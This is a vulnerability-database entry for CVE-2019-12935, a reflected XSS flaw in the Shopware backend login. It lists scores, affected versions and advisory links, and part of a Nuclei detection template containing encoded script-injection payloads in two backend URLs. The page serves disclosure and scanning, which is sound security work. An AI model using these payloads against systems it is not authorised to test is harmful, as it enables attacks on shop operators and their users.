CVE-2019-12935
published 2019-06-23CVE-2019-12935: Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
PriorityP336medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
2.73%
84.3th percentile
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| shopware | shopware | < 5.5.8 | 5.5.8 |
| shopware | shopware | >= 0 < 5.5.8 | 5.5.8 |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Shopware Cross-site Scripting Vulnerability
osv·2022-05-24
CVE-2019-12935 [MEDIUM] Shopware Cross-site Scripting Vulnerability
Shopware Cross-site Scripting Vulnerability
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
GHSA
Shopware Cross-site Scripting Vulnerability
ghsa·2022-05-24
CVE-2019-12935 [MEDIUM] CWE-79 Shopware Cross-site Scripting Vulnerability
Shopware Cross-site Scripting Vulnerability
Shopware before 5.5.8 has XSS via the Query String to the backend/Login or backend/Login/load/ URI.
No detection rules found.
Nuclei
Shopware < 5.5.8 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-12935 [MEDIUM] Shopware < 5.5.8 - Cross-Site Scripting
Shopware Shopware 5 - Backend (c) shopware AG','Shopware.Application.start')"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert(document.domain)"
- type: status
status:
- 200
- 401
condition: or
# digest: 4a0a004730450220734da703dab5a38e7ab8e8b377312fb756ac2322bbada53e6e53274069be35bf022100ecd15f5e57d1833fbd7a63aed0add51c214944a77942cc4c83bbad6d7a5ddfb2:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153145/Shopware-5.5.6-Cross-Site-Scripting.htmlhttp://seclists.org/fulldisclosure/2019/Jun/32https://www.netsparker.com/web-applications-advisories/ns-19-004-cross-site-scripting-in-shopware/https://www.shopware.com/en/changelog/#5-5-8http://packetstormsecurity.com/files/153145/Shopware-5.5.6-Cross-Site-Scripting.htmlhttp://seclists.org/fulldisclosure/2019/Jun/32https://www.netsparker.com/web-applications-advisories/ns-19-004-cross-site-scripting-in-shopware/https://www.shopware.com/en/changelog/#5-5-8
2019-06-23
Published